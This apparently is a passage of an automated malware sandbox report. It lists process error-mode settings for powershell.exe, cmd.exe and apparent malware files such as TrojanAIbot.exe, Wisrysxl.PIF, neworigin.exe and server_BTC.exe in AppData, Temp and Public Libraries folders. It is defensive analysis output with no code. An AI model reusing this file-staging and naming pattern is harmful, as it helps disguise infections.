                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
